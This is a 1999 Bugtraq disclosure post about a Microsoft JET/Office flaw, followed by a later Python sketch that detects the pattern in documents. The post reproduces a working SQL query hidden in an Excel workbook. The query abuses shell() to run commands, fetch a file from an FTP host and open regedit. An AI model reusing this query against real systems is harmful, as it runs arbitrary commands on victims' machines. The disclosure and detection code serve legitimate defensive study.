[11452] in bugtraq
Microsoft JET/Office Vulnerability Exploit
daemon@ATHENA.MIT.EDU (Ollie Whitehouse)
Sat Aug 21 01:35:37 1999
Message-Id:  <E153A2F0408CD111955000A0C9609C083BA942@exchange.servers.delphis.net>
Date:         Thu, 19 Aug 1999 12:27:01 +0100
Reply-To: Ollie Whitehouse <ollie@DELPHISPLC.COM>
From: Ollie Whitehouse <ollie@DELPHISPLC.COM>
X-To:         BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
All,
Russ Cooper:
> Well, with the module password protected it seems clear you're not out
> to get that critique very quickly. Maybe if you'd let someone know the
> details we'd be able to answer you. As it is, we're simply left with
> what appears to be the same exploit.
Below is the code from the workbook:
[Code]
SELECT shell('command.com /C echo user anonymous
yeah@right.com'+chr$(10)+'get .welcome c:\ftptest.txt'+chr$(10)+'quit  >
c:\jexploit.log'), shell('command.com /C ftp -s:C:\jexploit.log -n
ftp.aol.c..D.A..om',1), shell('command.com /C regedit',1)..FROM config.sys
[RAW Dump from the workbook from the SF web site]
SELECT shell('command.com /C echo user anonymous
yeah@right.com'+chr$(10)+'get .welcome c:\ftptest.txt'+chr$(10)+'quit  >
c:\jexploit.log'), shell('command.com /C ftp -s:C:\jexploit.log -n
ftp.aol.c..D.A..om',1), shell('command.com /C regedit',1)..FROM config.sys
config.......DBQ=C:\;DefaultDir=C:\;Driver={Microsoft Text Driver (*.txt;
*.csv)};DriverId=27;Extensions=asc,csv,ini,tab,txt;FIL=text;Implic..}.z..itC
ommitSync=Yes;MaxBufferSize=512;MaxScanRows=25;PageTimeout=5;SafeTransaction
s=0;Threads=3;UID=admin;UserCommitSync=Yes
That will be enough information for people who want to create their own
working demo.
Ollie
<%
Ollie Whitehouse
I.T Co-Ordinator - Delphis Consulting
VOX : +44 (0)207 916 0200 (Switchboard)
FAX : +44 (0)207 916 1620 (Main)
FAX : +44 (0)870 0881837 (FAX - E-Mail)
PGP : http://www.ombs.demon.co.uk/pgp.txt
Tag : Who needs Windows2000 when you have OS/2?
%>
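A detection sketch for the pattern in the query above, added here as an example and not part of the original post: it scans a document's raw bytes for a SELECT statement that calls shell() and reports the ODBC driver named after it. The function names other than shell(), the 1024-byte window and the sample bytes are assumptions constructed for illustration.

```python
import re

# shell() is the call used in the post; the other two names are assumptions
# added here as further expression functions a reviewer may want flagged.
RISKY = (b"shell", b"createobject", b"environ")
SELECT_RE = re.compile(rb"\bSELECT\b", re.I)
CALL_RE = re.compile(rb"\b(" + b"|".join(RISKY) + rb")\s*\(", re.I)
DRIVER_RE = re.compile(rb"Driver=\{([^}]{1,80})\}", re.I)
WINDOW = 1024  # bytes after SELECT searched for a call (assumed value)


def normalise(data):
    """Drop NUL bytes so UTF-16LE and 8-bit strings match the same patterns."""
    return data.replace(b"\x00", b"")


def scan(data):
    """Return one finding per SELECT that calls a flagged function.

    Offsets refer to the NUL-stripped data, not the original file."""
    text = normalise(data)
    findings = []
    for sel in SELECT_RE.finditer(text):
        window = text[sel.start():sel.start() + WINDOW]
        calls = sorted({m.group(1).lower().decode() for m in CALL_RE.finditer(window)})
        if not calls:
            continue
        drv = DRIVER_RE.search(text, sel.start())
        findings.append({
            "offset": sel.start(),
            "calls": calls,
            "driver": drv.group(1).decode("latin-1") if drv else None,
        })
    return findings


# Constructed samples; the command is a harmless placeholder, not the post's query.
SAMPLE_FLAGGED = (
    b"\x09\x08\x10\x00"
    + "SELECT shell('EXAMPLE.EXE',1) FROM config.sys".encode("utf-16-le")
    + b"\x01\x02DBQ=C:\\;Driver={Microsoft Text Driver (*.txt; *.csv)};DriverId=27"
)
SAMPLE_CLEAN = b"\x09\x08SELECT name FROM config.sys\x00a seashell (pink)"

if __name__ == "__main__":
    for label, blob in (("flagged", SAMPLE_FLAGGED), ("clean", SAMPLE_CLEAN)):
        print(label, scan(blob))
```

The match is a byte-level heuristic, so a hit means the file deserves a manual look at its embedded queries, not that it is confirmed malicious.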